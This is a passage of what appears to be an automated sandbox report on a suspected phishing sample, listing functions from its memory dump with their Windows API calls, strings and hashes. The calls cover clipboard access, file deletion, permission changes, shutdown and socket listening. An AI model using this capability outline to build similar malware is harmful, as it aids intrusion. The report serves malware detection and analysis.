Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 8e8bdfd24b3eeb796783d6411f250812fd04d0dc04bd27db36b9c3e476ab93ce
Instruction ID: 919d500a3c31dc812ddc4e3d7aaa89f5ef79d5fd64936b6108c304f93c8e7279
Opcode Fuzzy Hash: 8e8bdfd24b3eeb796783d6411f250812fd04d0dc04bd27db36b9c3e476ab93ce
Instruction Fuzzy Hash: E4818DB190020AAFEF219FA8DD49FEE7BBDFF48704F144129F915A62A0C7318944DB24

Function 00990B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00991114
Part of subcall function 009910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00990B9B,?,?,?), ref: 00991120
Part of subcall function 009910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00990B9B,?,?,?), ref: 0099112F
Part of subcall function 009910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00990B9B,?,?,?), ref: 00991136
Part of subcall function 009910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0099114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00990BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00990C00
GetLengthSid.ADVAPI32(?), ref: 00990C17
GetAce.ADVAPI32(?,00000000,?), ref: 00990C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00990C6D
GetLengthSid.ADVAPI32(?), ref: 00990C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00990C8C
HeapAlloc.KERNEL32(00000000), ref: 00990C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00990CB4
CopySid.ADVAPI32(00000000), ref: 00990CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00990CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00990D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00990D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00990D45
HeapFree.KERNEL32(00000000), ref: 00990D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00990D55
HeapFree.KERNEL32(00000000), ref: 00990D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00990D65
HeapFree.KERNEL32(00000000), ref: 00990D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00990D78
HeapFree.KERNEL32(00000000), ref: 00990D7F

Part of subcall function 00991193: GetProcessHeap.KERNEL32(00000008,00990BB1,?,00000000,?,00990BB1,?), ref: 009911A1
Part of subcall function 00991193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00990BB1,?), ref: 009911A8
Part of subcall function 00991193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00990BB1,?), ref: 009911B7

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: e48dc554cb2a380d681f65725e7088d4f666919ab9674fd7ea5badf870af6d30
Instruction ID: 6d7bd2ba0049379459605b1f6ab06b4ab934ca0ee9066e1d5bdfde525b3cf2cf
Opcode Fuzzy Hash: e48dc554cb2a380d681f65725e7088d4f666919ab9674fd7ea5badf870af6d30
Instruction Fuzzy Hash: 887159B2D0420AAFDF10DFA9DC45FAEBBBCBF44304F044515E929A7291D771AA05DBA0

Function 009AEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(009CCC08), ref: 009AEB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 009AEB37
GetClipboardData.USER32(0000000D), ref: 009AEB43
CloseClipboard.USER32 ref: 009AEB4F
GlobalLock.KERNEL32(00000000), ref: 009AEB87
CloseClipboard.USER32 ref: 009AEB91
GlobalUnlock.KERNEL32(00000000), ref: 009AEBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 009AEBC9
GetClipboardData.USER32(00000001), ref: 009AEBD1
GlobalLock.KERNEL32(00000000), ref: 009AEBE2
GlobalUnlock.KERNEL32(00000000), ref: 009AEC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 009AEC38
GetClipboardData.USER32(0000000F), ref: 009AEC44
GlobalLock.KERNEL32(00000000), ref: 009AEC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 009AEC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 009AEC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 009AECD2
GlobalUnlock.KERNEL32(00000000), ref: 009AECF3
CountClipboardFormats.USER32 ref: 009AED14
CloseClipboard.USER32 ref: 009AED59

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 0f24730e453789f766a54c27f4925e1085bfee8f572aa397da1800f9bc3219b2
Instruction ID: 2e6885cc37ab6b0a45c4ecd9658f71aa197f34d7c181b03592a03a5a9134e720
Opcode Fuzzy Hash: 0f24730e453789f766a54c27f4925e1085bfee8f572aa397da1800f9bc3219b2
Instruction Fuzzy Hash: C461D274208302AFD300EF24D989F6ABBE8EF85754F14451DF49A972A1CB71DD06DBA2

Function 009A698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009A69BE
FindClose.KERNEL32(00000000), ref: 009A6A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009A6A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009A6A75

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 009A6AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 009A6ADF

Strings

%4d, xrefs: 009A6BB1
%4d%02d%02d%02d%02d%02d%03d, xrefs: 009A6B32
%02d, xrefs: 009A6C00, 009A6C0A, 009A6C5A, 009A6CAA, 009A6CFA, 009A6D4A
%4d%02d%02d%02d%02d%02d, xrefs: 009A6B6A
%03d, xrefs: 009A6DA2

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 37910f8fa051bb68a086b1f4b79f9cfed1b4741d18ac283fca54cf6687aa4a5a
Instruction ID: e042788332029ee7fb9b999e77470769321a04111521525ef27fcc0e58e0471f
Opcode Fuzzy Hash: 37910f8fa051bb68a086b1f4b79f9cfed1b4741d18ac283fca54cf6687aa4a5a
Instruction Fuzzy Hash: 97D16EB2508300AFC714EBA4C995FABB7ECAFC9704F44491DF589D6191EB74DA04CBA2

Function 009A9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 009A9663
GetFileAttributesW.KERNEL32(?), ref: 009A96A1
SetFileAttributesW.KERNEL32(?,?), ref: 009A96BB
FindNextFileW.KERNEL32(00000000,?), ref: 009A96D3
FindClose.KERNEL32(00000000), ref: 009A96DE
FindFirstFileW.KERNEL32(*.*,?), ref: 009A96FA
SetCurrentDirectoryW.KERNEL32(?), ref: 009A974A
SetCurrentDirectoryW.KERNEL32(009F6B7C), ref: 009A9768
FindNextFileW.KERNEL32(00000000,00000010), ref: 009A9772
FindClose.KERNEL32(00000000), ref: 009A977F
FindClose.KERNEL32(00000000), ref: 009A978F

Strings

*.*, xrefs: 009A96F5

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: b45dedf306ea9e81065d2bd47c32e121ad75a7202ad4bff73627c79e2b35e719
Instruction ID: 3e8857a0b25f1ae787b441cead1a5113bbb1ed82d836e43655dc3969b9d6ae77
Opcode Fuzzy Hash: b45dedf306ea9e81065d2bd47c32e121ad75a7202ad4bff73627c79e2b35e719
Instruction Fuzzy Hash: B231E4729442196EDF14EFB5EC08EEE7BACAF8A321F104155F929E2190DB30DD448FA0

Function 009A979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 009A97BE
FindNextFileW.KERNEL32(00000000,?), ref: 009A9819
FindClose.KERNEL32(00000000), ref: 009A9824
FindFirstFileW.KERNEL32(*.*,?), ref: 009A9840
SetCurrentDirectoryW.KERNEL32(?), ref: 009A9890
SetCurrentDirectoryW.KERNEL32(009F6B7C), ref: 009A98AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 009A98B8
FindClose.KERNEL32(00000000), ref: 009A98C5
FindClose.KERNEL32(00000000), ref: 009A98D5

Part of subcall function 0099DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0099DB00

Strings

*.*, xrefs: 009A983B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: cf4f3451e4559183a948147602811e31aa4c6dab2e70e69921f116c410f89ed0
Instruction ID: fbaa373aab8d4b1f36c4a5e45536472c6ca633f4bf9db72b12624ececf0fe4fb
Opcode Fuzzy Hash: cf4f3451e4559183a948147602811e31aa4c6dab2e70e69921f116c410f89ed0
Instruction Fuzzy Hash: 2731D2719442196EDF10EFB8EC48EEE7BBCEF87325F104155E924A2191DB38DA45CBA0

Function 009A8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 009A8257
SystemTimeToFileTime.KERNEL32(?,?), ref: 009A8267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009A8273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009A8310
SetCurrentDirectoryW.KERNEL32(?), ref: 009A8324
SetCurrentDirectoryW.KERNEL32(?), ref: 009A8356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009A838C
SetCurrentDirectoryW.KERNEL32(?), ref: 009A8395

Strings

*.*, xrefs: 009A839B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 0ebe1a2ffc62d89a72a900e51e9e343b720462b10e8479b0216343ee32c4c1ae
Instruction ID: 70998a9e02def938f45a8df1c34a3314e3f4d123967ac96f03b9cfb4dfa6ec00
Opcode Fuzzy Hash: 0ebe1a2ffc62d89a72a900e51e9e343b720462b10e8479b0216343ee32c4c1ae
Instruction Fuzzy Hash: 036138B25083459FCB10EF64C840AAFB7E8FF89314F04891AF99997251EB35E945CF92

Function 0099D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00933AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00933A97,?,?,00932E7F,?,?,?,00000000), ref: 00933AC2

Part of subcall function 0099E199: GetFileAttributesW.KERNEL32(?,0099CF95), ref: 0099E19A

FindFirstFileW.KERNEL32(?,?), ref: 0099D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0099D1DD
MoveFileW.KERNEL32(?,?), ref: 0099D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0099D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0099D237

Part of subcall function 0099D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0099D21C,?,?), ref: 0099D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0099D253
FindClose.KERNEL32(00000000), ref: 0099D264

Strings

\*.*, xrefs: 0099D0CD, 0099D0D6, 0099D0EB

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 7109ac977b135f11b761b37f8452e3e1737381f646ac4259e2208339dc7136b1
Instruction ID: ce1dceb1801995bdaf1079f28c93e08e030a4a06966a4c795bfd204cac07ca52
Opcode Fuzzy Hash: 7109ac977b135f11b761b37f8452e3e1737381f646ac4259e2208339dc7136b1
Instruction Fuzzy Hash: 5E616B71C0610DAECF15EBE4CA92AEDB7B9AF95300F608065E45277191EB30AF09DF60

Function 009AED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 009AED91
EmptyClipboard.USER32 ref: 009AED97
GlobalAlloc.KERNEL32(00000002,?), ref: 009AEDAC
CloseClipboard.USER32 ref: 009AEEA3

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: b5dbac9f27abfcc274082b2057cfd135e75967d4d3bad0ed6205cd2b20a0b0f9
Instruction ID: 7703384f51d95781575cc55315fc4bf6280a8ce5a20a89ee05e6d185dc5ce5a3
Opcode Fuzzy Hash: b5dbac9f27abfcc274082b2057cfd135e75967d4d3bad0ed6205cd2b20a0b0f9
Instruction Fuzzy Hash: 86419A75608612AFE720CF15D988F19BBE5FF45329F14C099E42A8B6A2C735EC42CBD1

Function 0099E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 009916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0099170D
Part of subcall function 009916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0099173A
Part of subcall function 009916C3: GetLastError.KERNEL32 ref: 0099174A

ExitWindowsEx.USER32(?,00000000), ref: 0099E932

Strings

@, xrefs: 0099E925
, xrefs: 0099E95C
, xrefs: 0099E920
SeShutdownPrivilege, xrefs: 0099E902

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: fe686d2e4f977ed205a165f7c15e92b9d1da0bc14328d2a5b185021847670aaf
Instruction ID: aa105d2877b3110ab45a6a23502b2992df08673788e890da63458c0a62f45adb
Opcode Fuzzy Hash: fe686d2e4f977ed205a165f7c15e92b9d1da0bc14328d2a5b185021847670aaf
Instruction Fuzzy Hash: E701F972A24211AFEF54A6BC9C86FBF726CA714790F150821FD13E21D2D9A55C4092A0

Function 009B1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009B1276
WSAGetLastError.WSOCK32 ref: 009B1283
bind.WSOCK32(00000000,?,00000010), ref: 009B12BA
WSAGetLastError.WSOCK32 ref: 009B12C5
closesocket.WSOCK32(00000000), ref: 009B12F4
listen.WSOCK32(00000000,00000005), ref: 009B1303
WSAGetLastError.WSOCK32 ref: 009B130D
closesocket.WSOCK32(00000000), ref: 009B133C

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: c406abd4cabe54a40400d87b5ee4b0dc513bccacf70b75ba9be05533b76182c4
Instruction ID: cda920e9dba5258a6fbd5f44b48ad1c72eeaa4006dd9a27e54392f0f53f256fe
Opcode Fuzzy Hash: c406abd4cabe54a40400d87b5ee4b0dc513bccacf70b75ba9be05533b76182c4
Instruction Fuzzy Hash: 45418271A001009FD710DF64C598B6ABBE5BF86328F588198E8569F2D3C771ED81CBE1

Function 0096B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0096B9D4
_free.LIBCMT ref: 0096B9F8
_free.LIBCMT ref: 0096BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,009D3700), ref: 0096BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00A0121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0096BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00A01270,000000FF,?,0000003F,00000000,?), ref: 0096BC36
_free.LIBCMT ref: 0096BD4B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 5fa479e909c3c2ef6a630e0534f4ca5d6b96ef2d4b2d32b723b86be14d0f9317
Instruction ID: 1b2195cbf07309a96ed1206c8185638e6ca0e35ae4bc69b90ac9ccd68f984355
Opcode Fuzzy Hash: 5fa479e909c3c2ef6a630e0534f4ca5d6b96ef2d4b2d32b723b86be14d0f9317
Instruction Fuzzy Hash: 63C10671A04208AFDB24DFB9DC51BAA7BBDEF85350F1441AAE494D7291F7309E82C750

Function 0099D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00933AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00933A97,?,?,00932E7F,?,?,?,00000000), ref: 00933AC2

Part of subcall function 0099E199: GetFileAttributesW.KERNEL32(?,0099CF95), ref: 0099E19A

FindFirstFileW.KERNEL32(?,?), ref: 0099D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0099D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0099D481
FindClose.KERNEL32(00000000), ref: 0099D498
FindClose.KERNEL32(00000000), ref: 0099D4A1

Strings

\*.*, xrefs: 0099D3F2

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: c35e9c8499eefd17b4c9e87e084c96a5c3b084cd8de975de013188e77c4a426d
Instruction ID: 3b18b694caeb356f146595dcf1dd9972cf00845a676aef21212b34f32c52e564
Opcode Fuzzy Hash: c35e9c8499eefd17b4c9e87e084c96a5c3b084cd8de975de013188e77c4a426d
Instruction Fuzzy Hash: BC317E7141D3459FC700EF64D891AAFB7A8AED1314F844A1DF4D5921A1EB20EA09DB63

Function 0096E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0096E645

Strings

1#IND, xrefs: 0096F83D
1#SNAN, xrefs: 0096F844
1#INF, xrefs: 0096F852
1#QNAN, xrefs: 0096F84B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 9a813d99b6eef08a7072384df3d9a3d465d1bfbf76aa5f153a4eacb6bf9b62e5
Instruction ID: ef61fd1aa35a5d1340e440aef9e658ae3da2fd468d9c46c55b303daf8900b130
Opcode Fuzzy Hash: 9a813d99b6eef08a7072384df3d9a3d465d1bfbf76aa5f153a4eacb6bf9b62e5
Instruction Fuzzy Hash: A3C24D71E086298FDB25CF28DD507EAB7B9EB44305F1445EAD84EE7240E778AE858F40

Function 009A648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009A64DC
CoInitialize.OLE32(00000000), ref: 009A6639
CoCreateInstance.OLE32(009CFCF8,00000000,00000001,009CFB68,?), ref: 009A6650
CoUninitialize.OLE32 ref: 009A68D4

Strings

.lnk, xrefs: 009A64BA, 009A6524, 009A65E0

